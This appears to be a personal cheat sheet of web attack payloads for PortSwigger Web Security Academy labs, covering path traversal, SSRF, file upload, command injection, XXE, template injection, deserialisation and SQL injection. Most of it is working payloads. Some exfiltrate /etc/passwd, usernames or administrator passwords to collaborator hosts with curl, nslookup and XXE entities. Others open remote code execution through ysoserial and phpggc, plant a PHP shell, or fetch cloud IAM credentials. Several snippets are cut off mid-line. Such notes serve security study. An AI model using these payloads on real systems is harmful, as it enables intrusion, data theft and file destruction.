BSCP4


Columns: Vulnerability | Test Case | Payload | Notes | Observation
Vulnerability: Directory Traversal
Where: - FileName parameter

Test Case: Absolute Path
Payload:
```
?file=/etc/passwd
```

Test Case: Nested / Stripped Sequences
Payload:
```
# Using nested traversal
# Linux:
....//....//....//etc/passwd -> ../../../etc/passwd
# Windows:
....\/....\/....\/windows\/win.ini -> ..\..\..\windows\win.ini
```

Test Case: URL Encoding
Payload:
```
..%2F..%2F..%2Fetc%2Fpasswd
# or double URL encode
..%252F..%252F..%252Fetc%252Fpasswd
```

Test Case: Current Working Directory Path
Payload:
```
/var/www/images/../../../etc/passwd
```

Test Case: Null Byte
Payload:
```
?file=../../../etc/passwd%00.png
```
Notes: if file extension validation is present.

Vulnerability: SSRF
Where:
- StockAPI
- Referer Header
- Next Product (OpenRedirect)
- On the host header you get CLIENT ERROR Forbidden

Test Case: Loopback Interface
Payload:
```
http://127.0.0.1
stockapi=http://localhost/admin
stockapi=http://127.0.0.1:22 # try different port numbers
```

Test Case: Bypassing Blacklist
Payload:
```
# Other things that resolve to 127.0.0.1
2130706433
017700000001
```
Notes:
- Register your own domain that resolves to 127.0.0.1 (burp collaborator can be used)
- Try switching b/w https:, http:, etc.

Test Case: Bypassing Whitelist
Payload:
```
127.0.0.1:80#@stock.weliketoshop.net/admin
# Check if host is
http://127.0.0.1@stock.weliketoshop.net:8080 -> result -> http://stock.weliketoshop.net:8080
# Here we try URL encoding
http://localhost:80%2523@stock.weliketoshop.net/
```
Observation (patterns):
```
hostB -> https://hostA/
https://expected-host:fakepassword@evil-host
https://evil-host#expected-host
https://expected-host.evil-host
```
Notes:
- The inspecting thing sees @, which resolves to stock.weliketoshop.net
- But due to # being present, the rest of the parsing is ignored and we get access to the admin panel
- Don't forget to encode # multiple times (3x)
- #@ -> localhost

Test Case: Bypassing Through Open Redirection
Payload: <Refer-to-notes>
Notes: Will only work if open-redirect is present.

Test Case: Flawed Request Parsing
Payload:
```
GET https://0ac500cf03eea421810858d600720083.web-security-academy.net/ HTTP/2
Host: dr8j97
```

Vulnerability: SSRF via Referer Header
Notes: -> Browse the site and send the product page req to intruder

Test Case: SSRF to Shellshock (identified by collaborator everywhere)
Where: User-Agent & Referer
Payload:
```
() { :; }; echo "hello world"
() { :; }; /usr/bin/nslookup $(whoami).BURP-COLLABORATOR-SUBDOMAIN
User-Agent:() { :; }; /usr/bin/nslookup $(whoami).xtulb4ze9r38qbyrzf4h5yhkfbl29xxm.oastify.com
```
Notes:
- No space between () { :; };
- Add the shellshock payload in the User-Agent string
- Send to intruder & add the payload to the referer, that is http://192.168.0.<p>:8080
- Bruteforce the IP range and on the right one, you will get a

Vulnerability: File Upload Vulnerabilities
Where:
- Profile File Upload
- Comment file upload (stage-3)

Test Case: File Upload with no validation
Payload:
```php
<?php echo file_get_contents('/home/carlos/secret'); ?>
```
Notes: Create shell.php & upload it.

Test Case: Change MIME type
Payload:
```
# Change to
image/jpeg
image/png
```
Notes: Upload the shell as is, just change the content type.

Test Case: Change the file upload directory location
Payload: - /files/avatar/1.php to /files/2.php
Notes: If uploaded, but not executed, change the directory the file is uploaded to.

Test Case: Override Server Configuration File
Payload:
```
# .htaccess
AddHandler application/x-httpd-php .php .php5 .html .htm

# web.config
<staticContent>
<mimeMap fileExtension=".json" mimeType="application/json" />
</staticContent>
```
Notes: # Override `.htaccess` or `web.config` file

Test Case: Bypass Blacklist
Payload:
```
.php5
.shtml
```
- Case-sensitive Validation: changing `.php` to `.pHp`
- Provide multiple extensions `exploit.php.jpg`
- Add trailing characters `exploit.php.`
- Try URL encoding `exploit%2fphp`
- Null Byte `exploit.asp;.jpg` or `exploit.asp%00.jpg`
- If non-recursive validation is there, then try `exploit.p.phphp` -> `exploit.php`

Test Case: Magic Bytes
Payload:
```
GIF87a
GIF89a
```
Notes:
1. When file is uploaded
2. When file is accessed

Test Case: Race Condition
Notes: In the lab, the file is uploaded on the server for a short period of time, scanned and then removed if a malicious nature is detected. In the small timeframe between upload and removal, we can get the contents of the file.
Payload:
- Send both requests `req-to-upload` & `req-to-access` to the repeater, add them to the same tab group, and run the attacks as `
- Upload the file and then quickly send

Test Case: Upload Client Side JS

Test Case: Upload using PUT method
Vulnerability: OS Command Injection
Where:
- Submit Feedback Section
- Comment Param
- Email Param

Test Case: Normal Injection
Payload:
```
# Linux
whoami
uname -a
ifconfig
netstat -an
ps -ef

# Windows
whoami
ver
ipconfig /all
netstat -an
tasklist
```

Test Case: Blind Injection - Time Delays
Payload:
```
& ping -c 10 127.0.0.1 &
```

Test Case: Redirect response to a file on server
Payload:
```
& whoami > /var/www/images/out.txt &
```

Test Case: Out of band techniques
Payload:
```
& nslookup <collaborator> &
```

Test Case: Exfiltrate Data
Payload:
```
& nslookup `whoami`.<collaborator> &
```

Test Case: Other Ways
Payload:
```
# Both windows & unix
&
&&
|
||

# Only unix
;
0x0a or \n ( new line character )

# To inject commands
`pwd`
$(pwd)
```

Vulnerability: XXE Injection
Where:
- ProductID & storeID
- File Upload
- Comment / Profile

Test Case: Reading Local Files
Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
```

Test Case: SSRF Getting IAM secret credentials
Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```

Test Case: Out Of Band Techniques
Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://zadrmxhk4hm6umwbcqzortumjdp4dx1m.oastify.com/"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
```
Notes: Getting out of band interaction.

Test Case: Out Of Band Interaction Using Parameter Entities
Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://96d1i7du0rigqwsl80vyn3qwfnle98xx.oastify.com"> %xxe; ]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
```
Notes: Using parameter entities.

Payload (external DTD and request body):
```
# External DTD
&#x25; exfil SYSTEM 'http://vpon1twgjd129ib7rmek6p9iy940swgl.oastify.com/?x=%file;'>">
%eval;
%exfil;

# Request Body
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a2d00b5048796ef82fced7301af009a.exploit-server.net/exploit"> %xxe;]>
```

Test Case: Blind XXE retrieve data via error messages
Payload:
```
# External DTD
&#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;

# Request Body
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a7900b904d986098006d9c301d9009d.exploit-server.net/exploit.dtd"> %xxe;]>
<root>
```
Notes: Changed content type to XML and then exploited it.

Test Case: XInclude (where XML is formed on server side)
Payload:
```
productId=<foo+xmlns%3axi%3d"http%3a//www.w3.org/2001/XInclude"><xi%3ainclude+parse%3d"text"+href%3d"file%3a///etc/passwd"/></foo>&storeId=1
```

Test Case: XXE via File Upload
Payload:
```xml
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
```
Notes: Create an SVG image with the payload and upload it.
Vulnerability: SSTI

Test Case: ERB Template (RUBY)
Payload:
```
# Detection
<%= 7*7 %>
# Exploitation
<%= system("whoami") %>
# Exfiltrating Data
<%= system("cur
```
Notes: The website sends a request for a product and on error redirects the user to a page saying `Unfortunately this product is out of stock`, with this message in the ?message parameter; that's where we inject.
# Indicators
- Unfortunately this product is out of stock (on the main page).
- ?message=

Test Case: Tornado template (Python) - Template Injection in Code Context
Where:
- Preferred Name: first, last, nickname
- Blog edit template
- HTML
Payload:
```
# Detection
{{7*7}}
# to Context
user.name}}{{7*7}}
# Exploitation
{% import os %}{{os.system('rm /h
```
Notes: The injection is injected into a code context & in order to escape it, you need to close the context.
Observation: Code escaping possible but not XSS.

Test Case: Free Marker (Java)
Where: { Manually Find Out }
Payload:
```
# Detection
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20T
```
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20

Test Case: Handlebars
Where: { Manually Find Out }
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20
Payload:
```
string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('rm morale.txt');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
```
```
h (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return require('child_process').exec('curl -F file=@/etc/passwd https://r0sgybqn6bd4psqrkj5odpygh7nybp3ds.oastify.com/');"}}
{{this.pop}}
{{#each conslist}}
```

Test Case: Django Template
Where: { Manually Find Out }
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20
Payload:
```
{{ 7*7 }} : gives error with django templates
ih0vr{{364|add:733}}d121r -> ih0vr1097d121r

# Exploitation
{% debug %} # find the object `settings`, look it up online, you'll find an attribute SECRET_KEY
{{settings.SECRET_KEY}} # asking object settings for attribute
```

Vulnerability: Insecure Deserialisation

Test Case: Modifying Serialised Objects
Payload:
```
# Original
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
# Tampered
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
```
Notes: Getting access to the admin panel by changing the username.

Test Case: Modifying Datatypes
Where:
- Serialised session cookie
- Base64 decode and identify
- The error you should be looking for is java.io.StreamCorruptedException
Payload:
```
# Original
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"c0fpqkjg667odl5i52g20g9r9714lnns";}
# Tampered
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}
```
Notes: Getting access to the admin account by exploiting how php treats JS: 'adasdasda'=='0' will be true, as php will convert the string into a number, and if the first character is a number it'll be true, otherwise false.

Test Case: Deleting / Reading File of some other user
Payload:
```
# Original
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"ynuxehl8lrouh4fxaxri1bsylz8047gs";s:11:"avatar_link";s:19:"users/wiener/avatar";}
# Tampered
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"ynuxehl8lrouh4fxaxri1bsylz8047gs";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
```
Notes: Deleting or accessing carlos's file.

Test Case: Arbitrary object injection in PHP
Payload:
```
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
```
Notes:
- View source, you might find a php file
- We use the class exposed in the php file and use its constructor method to delete the file

Test Case: Exploiting Java deserialization with Apache Commons
Payload:
```bash
java -jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 -w0
```
Notes: - Indication: `ac ed` or `rO0` present at the beginning of the session cookie / serialized data

Test Case: Exploiting PHP deserialization with a pre-built gadget chain
Notes:
- reveals anything about the framework in use
- Step 2 : Once the framework is identified, which is `Symfony Version 4.3.6`, use phpggc to create the payload
- Step 3 : Before we can use this, we would need to sign it
Payload:
```
OjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtajVndG5tdzByazhvbXExdWthMmU2eG14aWQ5Ynl4MSI7fQ==","sig_hmac_sha1":"4f828b6d6dd88d337cdb12c447243560f36e8376"}
```
```bash
./phpggc Symfony/RCE7 exec 'rm /home/carlos/morale.txt' | base64 -w0
./phpggc Symfony/RCE7 exec 'curl -F file=@/etc/passwd https://qnh45rouxc7dalerob7v00xympsgga4z.oastify.com' | base64 -w0
```
```php
<?php
// TO Sign
$object = "OBJECT-GENERATED-BY-PHPGGC";
$secretKey = "LEAKED-SECRET-KEY-FROM-PHPINFO.PHP";
$cookie = urlencode('{"token":"' . $object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $object, $secretKey) . '"}');
echo $cookie;
```
Observation: - Here the token is signed, hence we would need the secret key to sign it.

Test Case: Exploiting Ruby deserialization using a documented gadget chain
Notes: Run the code in your BSCP directory on https://onecompiler.com/ruby/428epcnus, then run `echo "payload" | base64 -d | base64 -w0` & copy.
Vulnerability: SQL Injection
Where:
- TrackingID Cookie : BlindSQL
- Product Category : ?category=pets

Test Case: Boolean Based SQL Injection
Payload:
```
admin' -- -
admin' AND 1=1-- -
```

Test Case: Determining the column datatype
Payload:
```
' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--
```

Test Case: Union Based SQL Injection
Payload:
```
category=Pets' UNION SELECT NULL,NULL-- -
/filter?category=Pets' UNION SELECT table_name,NULL FROM information_schema.tables-- -
/filter?category=Pets' UNION SELECT column_name,NULL FROM+information_schema.columns WHERE table_name='tb'-- -
```
Notes:
```
# Retrieving Information From Database
# Getting Tables
SELECT * FROM information_schema.tables
```

Test Case: Union Based SQL Injection : Oracle DB
Payload:
```
/filter?category=
FROM dual-- -
/filter?category=Pets' UNION SELECT table_name,NULL FROM all_tables-- -
/filter?category=Pets' UNION SELECT column_name,NULL FROM all_tab_columns WHERE table_name='USERS_OIDFJF'-- -
/filter?category=Pets' UNION SELECT USERNAME
```

Test Case: Union Based SQL Injection : Retrieving Data From Multiple Columns into one
Payload:
```
/filter?category=Gifts' UNION SELECT NULL,table_name FROM information_schema.tables-- -
/filter?category=Gifts' UNION SELECT NULL,username||'~'||password FROM users--
```

Test Case: Blind SQL Using Conditional Response
Observation: Welcome back
- Confirming table `users` exists
```sql
TrackingId=xyz' AND (SELECT 1 FROM users LIMIT 1)=1-- -
```
- Confirming column username exists
```sql
TrackingId=xyz' AND (SELECT username FROM users WHERE username='administrator')='administrator'-- -
```
- Enumerating the password

Test Case: Error Based Blind SQL : 500 & 200
Payload:
```sql
CASE WHEN(1=2) THEN 1/0 ELSE 1 END FROM users WHERE username='administrator')=1-- -
```
# Error : here we changed the table name to a non-existing one and we get the error
```sql
iXYYA0JufusvlWsS' AND (SELECT CASE WHEN(1=2) THEN 1/0 ELSE 1 END FROM usersss WHERE username='administrator')=1--
```
Notes: - Now we can use this conditional behaviour to enumerate tables

Test Case: Error Based Blind SQL : Verbose Error Messages : Cast
Payload:
```sql
OKUELbuJ' AND 1=CAST((SELECT 1) AS int)--
TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
```
Error:
```
Unterminated string literal started at position 95 in SQL
```
Observation: Confirming table `users` exists & username administrator too

Test Case: Blind SQL Using Time Delays
Payload:
```sql
umnGRjvzUWOjjA18'; SELECT CASE WHEN(username='administrator') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- -
```
- Confirming the password length
```sql
umnGRjvzUWOjjA18'; SELECT CASE
```

Test Case: Blind SQL Using Out Of Band Techniques
Payload:
```
"UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://5w2bez8il8dfygc8i0fkqa0s0j6au5iu.oastify.com/"> %remote;]>'),'/l') FROM dual-- -

# Lab : Exfiltrating Data
TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+
```
Request:
```
6512b1807a210400070017.web-security-academy.net
Cookie: TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.wqq28q29fz76s76zcr9bk1ujua01osngc.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--;
```
Notes: Paste it directly in the request; encodings might create problems, so don't forget to troubleshoot.

Test Case: Blind SQL via XXE
Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.7jrl18kbtt3u62a8ks3cwhtfi6oxco0d.oastify.com/"> %remote;]>
```

Test Case: Blind SQL in XML Data & Bypassing Firewall
Payload:
```xml
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId></stockCheck>
```
Notes:
```
<storeId>1 UNION SELECT NULL</storeId>
```
returns back with "Attack Detected"
# Now we try to bypass it using hackvertor: Extensions > Hackvertor > Encode > dec_entities/hex_entities
```
<@hex_entities>1+UNION+SELECT+NULL<@/hex_entities>
```
# Now we craft the payload
```
<@hex_entities>1 UNION SELECT username || '~' || password
```
